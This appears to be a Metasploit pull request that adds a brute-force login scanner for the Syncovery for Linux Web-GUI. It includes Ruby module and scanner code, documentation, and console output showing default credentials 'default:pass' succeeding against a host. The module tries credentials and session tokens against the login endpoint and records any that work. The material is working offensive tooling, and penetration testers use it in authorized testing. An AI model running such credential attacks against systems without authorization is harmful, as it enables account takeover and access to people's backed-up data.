### PR TITLE
Syncovery for Linux - Login brute-force utility

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
+++ b/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
@@ -1,22 +1,25 @@
-## Syncovery For Linux Web-GUI Login Brute-Forcer
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
 
 This module attempts to brute-force valid login credentials for the Syncovery File Sync & Backup Software Web-GUI for Linux.
 The default credentials are checked by default.
 
-## Authors
+### Authors
 
 - Jan Rude (mgm security partners GmbH)
 
-## Platforms
+### Platforms
 
 - Unix
 
 ## Verification Steps
 
-1. `modules/auxiliary/scanner/http/syncovery_linux_login`
-2. `set RHOSTS <TARGET HOSTS>`
-3. `run`
-5. On success you should get valid credentials.
+1. Install the application
+2. Start msfconsole
+3. Do: `use modules/auxiliary/scanner/http/syncovery_linux_login`
+4. Do: `set RHOSTS <TARGET HOSTS>`
+5. Do: `run`
+6. On success you should get valid credentials.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
+++ b/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
@@ -21,6 +21,20 @@ The default credentials are checked by default.
 5. Do: `run`
 6. On success you should get valid credentials.
 
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
 ## Scenarios
 
 ### Syncovery for Linux with default credentials

--- a/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
+++ b/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
@@ -16,7 +16,7 @@ The default credentials are checked by default.
 1. `modules/auxiliary/scanner/http/syncovery_linux_login`
 2. `set RHOSTS <TARGET HOSTS>`
 3. `run`
-5. On success you should get a valid token.
+5. On success you should get valid credentials.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
+++ b/documentation/modules/auxiliary/scanner/http/syncovery_linux_login.md
@@ -1,0 +1,64 @@
+## Syncovery For Linux Web-GUI Login Brute-Forcer
+
+This module attempts to brute-force valid login credentials for the Syncovery File Sync & Backup Software Web-GUI for Linux.
+The default credentials are checked by default.
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `modules/auxiliary/scanner/http/syncovery_linux_login`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `run`
+5. On success you should get a valid token.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use modules/auxiliary/scanner/http/syncovery_linux_login
+msf6 auxiliary(scanner/http/syncovery_linux_login) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_login) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          pass             no        The password to Syncovery (default: pass)
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT             8999             yes       The target port (TCP)
+   SSL               false            no        Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host
+   TARGETURI         /                no        The path to Syncovery
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          default          yes       The username to Syncovery (default: default)
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_login) > run
+
+[+] 192.168.178.26:8999 - Syncovery File Sync & Backup Software confirmed
+[+] 192.168.178.26:8999 - Identified version: 9.48a
+[+] 192.168.178.26:8999 - Success: 'default:pass'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -109,7 +109,7 @@ module Metasploit
             end
 
             token = json_res['session_token']
-            if !token.blank?
+            if token.present?
               return { status: LOGIN_STATUS::SUCCESSFUL, proof: token.to_s }
             end
 

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -1,0 +1,139 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class SyncoveryFileSyncBackup < HTTP
+
+        DEFAULT_PORT = 8999 # HTTP=8999; HTTPS=8943
+        PRIVATE_TYPES = [ :password ]
+        LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name
+
+        # Checks if the target is Syncovery File Sync & Backup Software. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Syncovery, otherwise FalseClass
+        def check_setup
+          login_uri = normalize_uri("#{uri}/")
+          res = send_request({ 'uri' => login_uri })
+
+          if res && res.code == 200 && (res.body.include?('You can now log in to Syncovery on your machine') || res.body.include?('Syncovery'))
+            return true
+          end
+
+          false
+        end
+
+        # Checks if Syncovery Linux is used.
+        #
+        # @return [Boolean] true if Linux was found, otherwise FalseClass
+        def is_Linux?
+          globals = normalize_uri("#{uri}/get_global_variables")
+          res = send_request({ 'uri' => globals })
+
+          if res && res.code == 200
+            if res.body.scan(/"isSyncoveryLinux":"true"/).flatten[0] || res.body.scan(/"isSyncoveryWindows":"false"/).flatten[0]
+              return true
+            end
+
+            false
+          end
+
+          false
+        end
+
+        # Gets the Syncovery version.
+        #
+        # @return [String] version if version was found, otherwise FalseClass
+        def get_version
+          globals = normalize_uri("#{uri}/get_global_variables")
+          res = send_request({ 'uri' => globals })
+
+          if res && res.code == 200
+            version = res.body.scan(/"SyncoveryTitle":"Syncovery\s([A-Za-z0-9.]+)/).flatten[0] || ''
+            return version
+          end
+
+          false
+        end
+
+        # Actually doing the login. Called by #attempt_login
+        #
+        # @param username [String] The username to try
+        # @param password [String] The password or token to try
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body or the session token
+        def get_login_state(username, password)
+          # Prep the data needed for login
+          protocol = ssl ? 'https' : 'http'
+          peer = "#{host}:#{port}"
+
+          if username.empty?
+            # no username => token is used as password
+            login_uri = normalize_uri("#{uri}/profiles.json?recordstartindex=0&recordendindex=0")
+            res = send_request({
+              'uri' => login_uri,
+              'method' => 'GET',
+              'headers' => {
+                'token' => password
+              }
+            })
+            unless res
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+            end
+            if !(res.body.to_s).include? 'Session Expired'
+              return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body.to_s }
+            end
+
+            return { status: LOGIN_STATUS::INCORRECT, proof: res.body.to_s }
+          else
+            # use username:password
+            login_uri = normalize_uri("#{uri}/post_applogin.php?login=#{username}&password=#{password}")
+
+            res = send_request({
+              'uri' => login_uri,
+              'method' => 'GET'
+            })
+            unless res
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+            end
+
+            # After login, the application should give us a new token
+            # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
+            token = res.body.scan(%r{"session_token":"((?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)"}).flatten[0] || ''
+            if !token.blank?
+              return { status: LOGIN_STATUS::SUCCESSFUL, proof: token.to_s }
+            end
+
+            return { status: LOGIN_STATUS::INCORRECT, proof: res.to_s }
+          end
+        end
+
+        # Attempts to login to Syncovery File Sync & Backup Software. This is called first.
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          begin
+            result_opts.merge!(get_login_state(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # Something went wrong during login. 'e' knows what's up.
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -45,7 +45,7 @@ module Metasploit
         #
         # @return [String] version if version was found, otherwise FalseClass
         def get_version
-          globals = normalize_uri("#{uri}/aa/get_global_variables")
+          globals = normalize_uri("#{uri}/get_global_variables")
           res = send_request({ 'uri' => globals })
           if res && res.code == 200
             json_res = res.get_json_document

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -50,7 +50,7 @@ module Metasploit
 
           if res && res.code == 200
             json_res = res.get_json_document
-            version = (json_res['SyncoveryTitle']).scan(/Syncovery\s([A-Za-z0-9.]+)/).flatten[0] || ''
+            version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
             return version
           end
 

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -24,23 +24,6 @@ module Metasploit
           false
         end
 
-        # Checks if Syncovery Linux is used.
-        #
-        # @return [Boolean] true if Linux was found, otherwise FalseClass
-        def linux?
-          globals = normalize_uri("#{uri}/get_global_variables")
-          res = send_request({ 'uri' => globals })
-          if res && res.code == 200
-            json_res = res.get_json_document
-            if json_res['isSyncoveryLinux'] || !json_res['isSyncoveryWindows']
-              return true
-            end
-
-            false
-          end
-          false
-        end
-
         # Gets the Syncovery version.
         #
         # @return [String] version if version was found, otherwise FalseClass

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -17,7 +17,7 @@ module Metasploit
           login_uri = normalize_uri("#{uri}/")
           res = send_request({ 'uri' => login_uri })
 
-          if res && res.code == 200 && (res.body.include?('You can now log in to Syncovery on your machine') || res.body.include?('Syncovery'))
+          if res && res.code == 200 && res.body.include?('Syncovery')
             return true
           end
 
@@ -45,9 +45,8 @@ module Metasploit
         #
         # @return [String] version if version was found, otherwise FalseClass
         def get_version
-          globals = normalize_uri("#{uri}/get_global_variables")
+          globals = normalize_uri("#{uri}/aa/get_global_variables")
           res = send_request({ 'uri' => globals })
-
           if res && res.code == 200
             json_res = res.get_json_document
             version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
@@ -86,7 +85,7 @@ module Metasploit
               return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body.to_s }
             end
 
-            return { status: LOGIN_STATUS::INCORRECT, proof: res.body.to_s }
+            return { proof: res.body.to_s }
           else
             # use username:password
             res = send_request({
@@ -104,16 +103,12 @@ module Metasploit
             # After login, the application should give us a new token
             # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
             json_res = res.get_json_document
-            unless json_res
-              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
-            end
-
             token = json_res['session_token']
             if token.present?
               return { status: LOGIN_STATUS::SUCCESSFUL, proof: token.to_s }
             end
 
-            return { status: LOGIN_STATUS::INCORRECT, proof: res.to_s }
+            return { proof: res.to_s }
           end
         end
 

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -98,7 +98,7 @@ module Metasploit
               'method' => 'GET'
             })
             unless res
-              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT }
             end
 
             # After login, the application should give us a new token

--- a/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
+++ b/lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb
@@ -100,7 +100,12 @@ module Metasploit
 
             # After login, the application should give us a new token
             # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
-            token = res.body.scan(%r{"session_token":"((?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)"}).flatten[0] || ''
+            json_res = res.get_json_document
+            unless json_res
+               # ....
+            end
+            
+            token = json_res['session_token']
             if !token.blank?
               return { status: LOGIN_STATUS::SUCCESSFUL, proof: token.to_s }
             end

--- a/modules/auxiliary/scanner/http/syncovery_linux_login.rb
+++ b/modules/auxiliary/scanner/http/syncovery_linux_login.rb
@@ -1,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/login_scanner/syncovery_file_sync_backup'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery For Linux Web-GUI Login Utility',
+        'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
+        'Author' => [ 'Jan Rude' ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8999,
+          'USERNAME' => 'default',
+          'PASSWORD' => 'pass',
+          'STOP_ON_SUCCESS' => true # There is only one user
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']),
+        OptString.new('PASSWORD', [false, 'The password to Syncovery (default: pass)', 'pass']),
+        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
+      ]
+    )
+
+    deregister_options('PASSWORD_SPRAY')
+  end
+
+  def scanner(ip)
+    @scanner ||= lambda {
+      cred_collection = build_credential_collection(
+        username: datastore['USERNAME'],
+        password: datastore['PASSWORD']
+      )
+
+      return Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
+        configure_http_login_scanner(
+          host: ip,
+          port: datastore['RPORT'],
+          cred_details: cred_collection,
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: 5,
+          http_username: datastore['HttpUsername'],
+          http_password: datastore['HttpPassword']
+        )
+      )
+    }.call
+  end
+
+  def report_good_cred(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      last_attempted_at: DateTime.now,
+      status: result.status,
+      proof: result.proof
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_bad_cred(ip, rport, result)
+    invalidate_login(
+      address: ip,
+      port: rport,
+      protocol: 'tcp',
+      public: result.credential.public,
+      private: result.credential.private,
+      realm_key: result.credential.realm_key,
+      realm_value: result.credential.realm,
+      status: result.status,
+      proof: result.proof
+    )
+  end
+
+  # Attempts to login
+  def bruteforce(ip)
+    scanner(ip).scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
+        report_good_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        vprint_brute(level: :verror, ip: ip, msg: result.proof)
+        report_bad_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::INCORRECT
+        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
+        report_bad_cred(ip, rport, result)
+      end
+    end
+  end
+
+  # Start here
+  def run_host(ip)
+    if scanner(ip).check_setup
+      vprint_brute(level: :good, ip: ip, msg: 'Syncovery File Sync & Backup Software confirmed')
+    else
+      print_brute(level: :error, ip: ip, msg: 'Target is not Syncovery File Sync & Backup Software')
+      return
+    end
+
+    version = scanner(ip).get_version
+    if !version
+      vprint_brute(level: :error, ip: ip, msg: 'Unknown version')
+    else
+      vprint_brute(level: :good, ip: ip, msg: "Identified version: #{version}")
+    end
+
+    bruteforce(ip)
+  end
+end

--- a/modules/auxiliary/scanner/http/syncovery_linux_login.rb
+++ b/modules/auxiliary/scanner/http/syncovery_linux_login.rb
@@ -58,6 +58,7 @@ class MetasploitModule < Msf::Auxiliary
         configure_http_login_scanner(
           host: ip,
           port: datastore['RPORT'],
+          uri: datastore['TARGETURI'],
           cred_details: cred_collection,
           stop_on_success: datastore['STOP_ON_SUCCESS'],
           bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

--- a/modules/auxiliary/scanner/http/syncovery_linux_login.rb
+++ b/modules/auxiliary/scanner/http/syncovery_linux_login.rb
@@ -16,8 +16,8 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'Syncovery File Sync & Backup Software Web-GUI Login Utility',
-        'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
+        'Name' => 'Syncovery For Linux Web-GUI Login Utility',
+        'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software For Linux Web-GUI.',
         'Author' => [ 'Jan Rude' ],
         'License' => MSF_LICENSE,
         'Platform' => 'linux',

--- a/modules/auxiliary/scanner/http/syncovery_linux_login.rb
+++ b/modules/auxiliary/scanner/http/syncovery_linux_login.rb
@@ -13,25 +13,27 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Syncovery File Sync & Backup Software Web-GUI Login Utility',
-      'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
-      'Author'      => [ 'Jan Rude' ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'linux',
-      'Notes' => {
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery File Sync & Backup Software Web-GUI Login Utility',
+        'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
+        'Author' => [ 'Jan Rude' ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
           'SideEffects' => []
         },
-      'DefaultOptions' =>
-        {
-          'RPORT'      => 8999,
-          'USERNAME'   => 'default',
-          'PASSWORD'   => 'pass',
+        'DefaultOptions' => {
+          'RPORT' => 8999,
+          'USERNAME' => 'default',
+          'PASSWORD' => 'pass',
           'STOP_ON_SUCCESS' => true # There is only one user
         }
-    ))
+      )
+    )
 
     register_options(
       [
@@ -56,13 +58,14 @@ class MetasploitModule < Msf::Auxiliary
         configure_http_login_scanner(
           host: ip,
           port: datastore['RPORT'],
-          cred_details:       cred_collection,
-          stop_on_success:    datastore['STOP_ON_SUCCESS'],
-          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
+          cred_details: cred_collection,
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
           connection_timeout: 5,
-          http_username:      datastore['HttpUsername'],
-          http_password:      datastore['HttpPassword']
-        ))
+          http_username: datastore['HttpUsername'],
+          http_password: datastore['HttpPassword']
+        )
+      )
     }.call
   end
 
@@ -76,11 +79,11 @@ class MetasploitModule < Msf::Auxiliary
     }
 
     credential_data = {
-      module_fullname: self.fullname,
+      module_fullname: fullname,
       origin_type: :service,
       private_data: result.credential.private,
       private_type: :password,
-      username: result.credential.public,
+      username: result.credential.public
     }.merge(service_data)
 
     login_data = {
@@ -112,13 +115,13 @@ class MetasploitModule < Msf::Auxiliary
     scanner(ip).scan! do |result|
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
+        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
         report_good_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
+        vprint_brute(level: :verror, ip: ip, msg: result.proof)
         report_bad_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
+        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
         report_bad_cred(ip, rport, result)
       end
     end
@@ -126,18 +129,18 @@ class MetasploitModule < Msf::Auxiliary
 
   # Start here
   def run_host(ip)
-    unless scanner(ip).check_setup
-      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Syncovery File Sync & Backup Software')
-      return
+    if scanner(ip).check_setup
+      vprint_brute(level: :good, ip: ip, msg: 'Syncovery File Sync & Backup Software confirmed')
     else
-      vprint_brute(:level => :good, :ip => ip, :msg => 'Syncovery File Sync & Backup Software confirmed')
+      print_brute(level: :error, ip: ip, msg: 'Target is not Syncovery File Sync & Backup Software')
+      return
     end
 
     version = scanner(ip).get_version
     if !version
-      vprint_brute(:level => :error, :ip => ip, :msg => 'Unknown version')
+      vprint_brute(level: :error, ip: ip, msg: 'Unknown version')
     else
-      vprint_brute(:level => :good, :ip => ip, :msg => "Identified version: #{version}")
+      vprint_brute(level: :good, ip: ip, msg: "Identified version: #{version}")
     end
 
     bruteforce(ip)

--- a/modules/auxiliary/scanner/http/syncovery_linux_login.rb
+++ b/modules/auxiliary/scanner/http/syncovery_linux_login.rb
@@ -13,27 +13,25 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Name' => 'Syncovery For Linux Web-GUI Login Utility',
-        'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
-        'Author' => [ 'Jan Rude' ],
-        'License' => MSF_LICENSE,
-        'Platform' => 'linux',
-        'Notes' => {
+    super(update_info(info,
+      'Name'        => 'Syncovery File Sync & Backup Software Web-GUI Login Utility',
+      'Description' => 'This module will attempt to authenticate to Syncovery File Sync & Backup Software Web-GUI.',
+      'Author'      => [ 'Jan Rude' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
           'SideEffects' => []
         },
-        'DefaultOptions' => {
-          'RPORT' => 8999,
-          'USERNAME' => 'default',
-          'PASSWORD' => 'pass',
+      'DefaultOptions' =>
+        {
+          'RPORT'      => 8999,
+          'USERNAME'   => 'default',
+          'PASSWORD'   => 'pass',
           'STOP_ON_SUCCESS' => true # There is only one user
         }
-      )
-    )
+    ))
 
     register_options(
       [
@@ -58,14 +56,13 @@ class MetasploitModule < Msf::Auxiliary
         configure_http_login_scanner(
           host: ip,
           port: datastore['RPORT'],
-          cred_details: cred_collection,
-          stop_on_success: datastore['STOP_ON_SUCCESS'],
-          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          cred_details:       cred_collection,
+          stop_on_success:    datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
           connection_timeout: 5,
-          http_username: datastore['HttpUsername'],
-          http_password: datastore['HttpPassword']
-        )
-      )
+          http_username:      datastore['HttpUsername'],
+          http_password:      datastore['HttpPassword']
+        ))
     }.call
   end
 
@@ -79,11 +76,11 @@ class MetasploitModule < Msf::Auxiliary
     }
 
     credential_data = {
-      module_fullname: fullname,
+      module_fullname: self.fullname,
       origin_type: :service,
       private_data: result.credential.private,
       private_type: :password,
-      username: result.credential.public
+      username: result.credential.public,
     }.merge(service_data)
 
     login_data = {
@@ -115,13 +112,13 @@ class MetasploitModule < Msf::Auxiliary
     scanner(ip).scan! do |result|
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
+        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
         report_good_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute(level: :verror, ip: ip, msg: result.proof)
+        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
         report_bad_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
+        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
         report_bad_cred(ip, rport, result)
       end
     end
@@ -129,18 +126,18 @@ class MetasploitModule < Msf::Auxiliary
 
   # Start here
   def run_host(ip)
-    if scanner(ip).check_setup
-      vprint_brute(level: :good, ip: ip, msg: 'Syncovery File Sync & Backup Software confirmed')
-    else
-      print_brute(level: :error, ip: ip, msg: 'Target is not Syncovery File Sync & Backup Software')
+    unless scanner(ip).check_setup
+      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Syncovery File Sync & Backup Software')
       return
+    else
+      vprint_brute(:level => :good, :ip => ip, :msg => 'Syncovery File Sync & Backup Software confirmed')
     end
 
     version = scanner(ip).get_version
     if !version
-      vprint_brute(level: :error, ip: ip, msg: 'Unknown version')
+      vprint_brute(:level => :error, :ip => ip, :msg => 'Unknown version')
     else
-      vprint_brute(level: :good, ip: ip, msg: "Identified version: #{version}")
+      vprint_brute(:level => :good, :ip => ip, :msg => "Identified version: #{version}")
     end
 
     bruteforce(ip)


### PR DESCRIPTION
## Syncovery Login Brute-Forcer
This module adds a login brute-forcer for [Syncovery for Linux](https://de.syncovery.com/download/linux/).
The default credentials are checked by default.

### Verification
Download and install a vulnerable version
1. `modules/auxiliary/scanner/http/syncovery_linux_login`
2. `set RHOSTS <TARGET HOSTS>`
3. `run`
5. On success valid credentials should be returned.
